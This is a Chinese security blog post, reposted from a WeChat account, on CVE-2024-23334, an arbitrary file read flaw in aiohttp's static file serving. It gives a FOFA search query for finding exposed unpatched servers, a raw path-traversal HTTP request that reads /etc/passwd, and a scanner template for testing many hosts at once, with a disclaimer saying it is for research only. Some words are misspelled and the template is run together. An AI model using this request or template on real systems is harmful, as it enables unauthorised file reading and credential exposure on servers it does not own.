漏洞简介
SPRING HAS ARRIVED
aiohtp9 是一个用于异步网络编程的Pvthon库,支持客户端和服务器端的网络通信。它利用Python的asyncio库来实现异步I0操作,这意味着它可以处理大量并发网络连接,而不会导致线程阻塞或性能下降。aiohttp常用于需要高性能网络通信的应用程序,如高频交易平台、大规模并发API服务等
漏洞复现
SPRING HAS ARRIVED
第一步、使用下面fofa语句进行资产收集...确认测试目标
fofa语句title=="ComfyUI" || (app="AIOHTTP" && server!="aiohttp/3.9.3" && server!="aiohttp/3.9.2")
第二步、访问网站首页,使用burp抓包发送到Repeater中修改数据包进行漏洞测试
GET /static/./../../../../../../../../etc/passwd HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://120.55.55.172:8082/Connection: closePragma: no-cacheCache-Control: no-cache
批量脚本
SPRING HAS ARRIVED
id: aiohttp-static-filereadinfo:name: aiohttp-static-任意文件读取(CVE-2024-23334)author: lyseverity: criticalmetadata:: title=="ComfyUI" || (app="AIOHTTP" && server!="aiohttp/3.9.3" && server!="aiohttp/3.9.2")http:raw:|GET /static/./../../../../../../../../etc/passwd HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: gzip, deflateAccept: */*Connection: closematchers:type: dsldsl:'status_code == 200 && contains(body,"root")'
原文始发于微信公众号(揽月安全团队):aiohttp-static-任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论